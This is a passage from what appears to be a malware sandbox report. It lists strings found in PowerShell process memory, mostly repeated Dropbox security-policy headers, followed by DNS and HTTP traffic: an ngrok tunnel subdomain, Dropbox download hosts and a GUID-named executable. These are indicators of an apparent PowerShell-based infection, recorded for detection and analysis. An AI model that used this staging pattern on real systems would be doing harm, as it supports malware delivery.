https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: media-src https://* blob: ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: brPolicy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: child-src https://www.dropbox.com/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: m/static/serviceworker/ blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: media-src https://* blob: ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ne' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                    Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                    Source: global trafficDNS traffic detected: DNS query: ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: ucdccc1744965d58711471073024.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: global trafficDNS traffic detected: DNS query: ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com
                    Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Content-Length: 207Content-Type: text/html; charset=utf-8Date: Thu, 19 Dec 2024 12:44:50 GMTServer: Werkzeug/3.0.3 Python/3.12.8Connection: close
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A5057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000000.2572942368.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802826541.0000000004410000.00000004.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: svchost.exe, 0000000C.00000002.3422478105.0000014A52A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
